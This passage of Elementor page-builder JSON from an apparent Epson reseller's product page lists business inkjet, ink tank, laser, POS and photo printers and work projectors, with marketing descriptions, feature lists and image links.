alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"67\",\"right\":\"67\",\"bottom\":\"67\",\"left\":\"67\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 